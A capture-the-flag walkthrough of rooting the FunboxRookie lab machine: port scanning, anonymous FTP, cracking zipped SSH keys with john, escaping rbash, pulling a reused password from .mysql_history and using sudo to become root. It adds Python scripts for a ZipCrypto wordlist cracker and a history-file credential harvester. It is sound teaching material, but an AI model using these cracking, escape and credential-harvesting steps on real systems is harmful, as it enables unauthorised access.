5. FunboxRookie target machine

I. Gathering information about the target

1. Known information:

  • IP: 192.168.245.107

2. Information gathered:

  • nmap scan for open services
┌──(lo0p㉿0xlo0p)-[~]
└─$ nmap -p "*" 192.168.245.107
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-27 10:53 CST
Nmap scan report for 192.168.245.107
Host is up (0.27s latency).
Not shown: 8348 closed tcp ports (conn-refused)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 401.07 seconds

Ports 21, 22 and 80 are open. Note that the -p "*" port specification selects ports by service name from nmap-services, so only the 8351 named ports were probed (8348 closed plus 3 open), not all 65535; use -p- for a full sweep. We look at port 80 first: it serves the Apache default page and gives nothing useful.

3. Anonymous FTP login

Log in over FTP with the anonymous account: the directory holds a set of zip archives, one per user name. Download them all (the mget transfer is omitted from the session below); extracting them turns out to require a password.

┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ ftp 192.168.245.107
Connected to 192.168.245.107.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.245.107]
Name (192.168.245.107:lo0p): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user [email protected] !
230-
230-The local time is: Thu Oct 27 03:22:03 2022
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to .
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||47501|)
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 anna.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 ariel.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 bud.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 cathrine.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 homer.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 jessica.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 john.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 marge.zip
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 miriam.zip
-r--r--r--   1 ftp      ftp          1477 Jul 25  2020 tom.zip
-rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
-rw-rw-r--   1 ftp      ftp          1477 Jul 25  2020 zlatan.zip
226 Transfer complete
ftp> quit
221 Goodbye.
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ unzip -o anna.zip
Archive:  anna.zip
[anna.zip] id_rsa password: 
   skipping: id_rsa                  incorrect password

4. Cracking the archive passwords with zip2john and john

┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ zip2john *.zip > pwd2.txt
ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 ariel.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 bud.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 cathrine.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 homer.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 jessica.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 john.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 marge.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 miriam.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
ver 2.0 efh 5455 efh 7875 zlatan.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ john pwd2.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
iubire           (tom.zip/id_rsa)     
1g 0:00:00:00 DONE 2/3 (2022-10-27 02:25) 33.33g/s 1563Kp/s 1563Kc/s 1563KC/s 123456..ferrises
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This gives the password for tom's archive: iubire. john prints only what it cracked in this session; run john --show pwd2.txt to list everything it has recovered before concluding that the remaining archives are uncrackable. Extract tom.zip with that password to obtain the id_rsa private key, then use it to log in to SSH as tom without a password.
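As an added example that is not part of the original writeup: the archives john loaded use PKWARE traditional encryption ("ZipCrypto", the PKZIP format in john's output). The script below implements that cipher and a wordlist attack against a constructed, stored (uncompressed) entry, to show why the 12-byte header check byte (john's TS_chk / crc check) makes PKZIP cracking so fast, and why a candidate that survives it still needs a full CRC verification before it counts as a crack. The key material and wordlist are constructed; iubire is the password recovered above. For a deflated entry like the real id_rsa (type=8 in zip2john's output) the data would have to be inflated before the CRC check.

```python
import os
import zlib
from typing import Iterable, Optional, Tuple

# CRC-32 table for the raw (un-inverted) update step that ZipCrypto uses.
CRCTAB = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRCTAB.append(c)


def _crc_step(crc: int, b: int) -> int:
    return CRCTAB[(crc ^ b) & 0xFF] ^ (crc >> 8)


class ZipCrypto:
    """PKWARE traditional ('ZipCrypto') stream cipher (APPNOTE section 6.1)."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:          # the password only seeds the key state
            self._update(b)

    def _update(self, b: int) -> None:
        self.k0 = _crc_step(self.k0, b)
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc_step(self.k2, self.k1 >> 24)

    def _keystream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            out.append(p ^ self._keystream_byte())
            self._update(p)         # key state advances on the plaintext byte
        return bytes(out)

    def decrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for c in data:
            p = c ^ self._keystream_byte()
            out.append(p)
            self._update(p)
        return bytes(out)


def encrypt_entry(plaintext: bytes, password: bytes) -> Tuple[bytes, int]:
    """Encrypt a stored entry the way a zip tool does: 11 random bytes plus a
    check byte (high byte of the CRC-32), then the data. Returns (ciphertext, crc);
    the CRC itself sits unencrypted in the zip headers, which is what the attacker reads."""
    crc = zlib.crc32(plaintext) & 0xFFFFFFFF
    header = os.urandom(11) + bytes([crc >> 24])
    return ZipCrypto(password).encrypt(header + plaintext), crc


def crack_entry(ciphertext: bytes, crc: int, wordlist: Iterable[bytes]) -> Tuple[Optional[bytes], int]:
    """Wordlist attack. Decrypting 12 header bytes and comparing one check byte
    rejects about 255 of 256 wrong passwords, which is why john reports millions
    of candidates per second; survivors are confirmed against the full CRC.
    Returns (password or None, number of full-CRC verifications performed)."""
    full_checks = 0
    for candidate in wordlist:
        z = ZipCrypto(candidate)
        if z.decrypt(ciphertext[:12])[11] != crc >> 24:
            continue                # cheap filter, 1/256 false-positive rate
        full_checks += 1
        if zlib.crc32(z.decrypt(ciphertext[12:])) & 0xFFFFFFFF == crc:
            return candidate, full_checks
    return None, full_checks


# Constructed stand-in for tom's id_rsa and a constructed mini wordlist; not data from the box.
SAMPLE_KEY = (b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
              b"constructed-sample-key-material-not-a-real-key\n"
              b"-----END OPENSSH PRIVATE KEY-----\n")
SAMPLE_WORDLIST = [b"123456", b"password", b"letmein", b"iubire", b"ferrises"]


def demo() -> Tuple[Optional[bytes], int]:
    ciphertext, crc = encrypt_entry(SAMPLE_KEY, b"iubire")
    return crack_entry(ciphertext, crc, SAMPLE_WORDLIST)


if __name__ == "__main__":
    password, checks = demo()
    print(f"recovered password: {password!r} after {checks} full CRC check(s)")
```

The same two-stage structure (cheap per-candidate filter, expensive confirmation) is what lets john try the whole password.lst in well under a second here; the speed comes from the format, not from a short password.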

┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ unzip tom.zip                                  
Archive:  tom.zip
[tom.zip] id_rsa password: 
  inflating: id_rsa
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ chmod 600 id_rsa
┌──(lo0p㉿0xlo0p)-[~/ftp_file]
└─$ ssh -i id_rsa tom@192.168.245.107
The authenticity of host '192.168.245.107 (192.168.245.107)' can't be established.
ED25519 key fingerprint is SHA256:ZBER3N78DusT56jsi/IGcAxcCB2W5CZWUJTbc3K4bZc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.245.107' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-117-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Oct 27 03:34:44 UTC 2022

  System load:  0.0               Processes:             172
  Usage of /:   74.9% of 4.37GB   Users logged in:       0
  Memory usage: 38%               IP address for ens256: 192.168.245.107
  Swap usage:   0%


30 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.
tom@funbox2:~$ find / -perm -4000 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
tom@funbox2:~$ sudo -l
[sudo] password for tom:
tom@funbox2:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom:/home/tom:/bin/rbash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:112:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:113:65534::/srv/ftp:/usr/sbin/nologin

tom's login shell is rbash, which is why the 2>/dev/null redirection was refused and why most commands are restricted; sudo -l prompted for a password we do not have yet.

5. Escaping rbash

Reference: 【渗透测试】--- rbash逃逸方法简述 (通地塔's blog on CSDN)

cp is still allowed here, so copy /bin/bash into the home directory and run bash. (The copy itself is not what does the work: rbash forbids cd, changes to PATH, output redirection and command names containing a slash, but running bash by name resolves /bin/bash through PATH and starts an unrestricted shell; the copy in the home directory would only be used if . were on PATH.)

tom@funbox2:~$ cp /bin/bash .
tom@funbox2:~$ bash

That escapes the restricted shell. Next, look for usable information: the home directory contains .bash_history, .mysql_history and similar files.

tom@funbox2:~$ ll
total 1148
drwxr-xr-x 5 tom  tom     4096 Oct 27 06:32 ./
drwxr-xr-x 3 root root    4096 Jul 25  2020 ../
-rwxr-xr-x 1 tom  tom  1113504 Oct 27 06:32 bash*
-rw------- 1 tom  tom       72 Oct 27 06:32 .bash_history
-rw-r--r-- 1 tom  tom      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 tom  tom     3771 Apr  4  2018 .bashrc
drwx------ 2 tom  tom     4096 Oct 27 03:34 .cache/
drwx------ 3 tom  tom     4096 Jul 25  2020 .gnupg/
-rw------- 1 tom  tom    12288 Oct 27 03:36 .local..swp
-rw-r--r-- 1 tom  tom       33 Oct 27 02:49 local.txt
-rw------- 1 tom  tom      295 Jul 25  2020 .mysql_history
-rw-r--r-- 1 tom  tom      807 Apr  4  2018 .profile
drwx------ 2 tom  tom     4096 Jul 25  2020 .ssh/
-rw-r--r-- 1 tom  tom        0 Oct 27 03:41 .sudo_as_admin_successful
-rw------- 1 tom  tom      728 Oct 27 03:40 .viminfo
tom@funbox2:~$ cat .mysql_history 
_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit

The .mysql_history file stands out. Viewing it in vim shows an INSERT statement carrying the user name tom and the password xx11yy22!. Credentials left in client and shell history files are frequently reused, so we try this one with sudo:
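As an added example, not part of the original writeup: a small helper that decodes libedit-format history files like the .mysql_history above, where _HiStOrY_V2_ is the header and spaces are stored as \040 octal escapes, and flags entries that look like they carry credentials (plain .bash_history passes through unchanged). The two sample histories are constructed to mirror what was found on the box; the pattern set and function names are my own and every hit is a candidate to verify, not proof.

```python
import re
from typing import List, Tuple

# Constructed sample modelled on tom's .mysql_history: libedit writes the
# "_HiStOrY_V2_" header and escapes spaces/non-printables as \ooo octal.
# Raw string so that Python does not decode the escapes itself.
SAMPLE_MYSQL_HISTORY = r"""_HiStOrY_V2_
show\040databases;
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
insert\040into\040support\040(tom,\040xx11yy22!);
quit
"""

# Constructed .bash_history-style sample (plain text, one command per line).
SAMPLE_BASH_HISTORY = """ls -la
mysql -u root -pS3cret! support
mysql -u tom -p support
"""

_OCTAL_ESCAPE = re.compile(r"\\([0-7]{3})")


def decode_history(text: str) -> List[str]:
    """Return history entries as typed: drop the libedit header if present and
    turn \\ooo escapes back into characters. Plain bash history is unaffected."""
    lines = text.splitlines()
    if lines and lines[0] == "_HiStOrY_V2_":
        lines = lines[1:]
    return [_OCTAL_ESCAPE.sub(lambda m: chr(int(m.group(1), 8)), ln)
            for ln in lines if ln.strip()]


# Heuristics for entries that embed a secret. Ordered: first match wins per line.
CRED_PATTERNS = (
    # CREATE USER 'x'@'h' IDENTIFIED BY 'pw' / GRANT ... TO 'x'@'h' IDENTIFIED BY 'pw'
    re.compile(r"'(?P<user>[^'@]+)'(?:@'[^']*')?\s+identified\s+by\s+'(?P<secret>[^']*)'", re.I),
    # mysql -u x -pPW with the password inline; a bare "-p" prompts and leaks nothing
    re.compile(r"-u\s*(?P<user>\S+)\s+-p(?P<secret>\S+)"),
    # the ad-hoc two-column INSERT seen on this box: insert into support (tom, xx11yy22!);
    re.compile(r"insert\s+into\s+\w+\s*\(\s*(?P<user>\w+)\s*,\s*(?P<secret>[^)\s]+)\s*\)", re.I),
)


def find_credentials(text: str) -> List[Tuple[str, str, str]]:
    """Return (user, secret, source_line) for every decoded entry matching a pattern."""
    hits = []
    for line in decode_history(text):
        for pat in CRED_PATTERNS:
            m = pat.search(line)
            if m:
                hits.append((m.group("user"), m.group("secret"), line))
                break
    return hits


if __name__ == "__main__":
    for sample in (SAMPLE_MYSQL_HISTORY, SAMPLE_BASH_HISTORY):
        for user, secret, src in find_credentials(sample):
            print(f"{user}:{secret}    <- {src}")
```

Run it against ~/.mysql_history, ~/.bash_history and ~/.psql_history once you have a shell; the decode step matters because grep for a literal "insert into" misses the \040-escaped form.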

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL

It works. The sudo -l entry corresponds to a sudoers line of the form tom ALL=(ALL:ALL) ALL, read as follows:

First ALL (inside the parentheses, before the colon): the users tom may run commands as; ALL means any user, root included.
Second ALL (after the colon): the groups tom may run commands as; ALL means any group.
Third ALL (after the parentheses): the commands permitted; ALL means any command.
The host field (the ALL before the equals sign in sudoers) limits which hosts the rule applies on and is not shown in the sudo -l output.

So a plain sudo su yields a root shell. This box is far too easy.

tom@funbox2:~$ sudo su
root@funbox2:/home/tom#
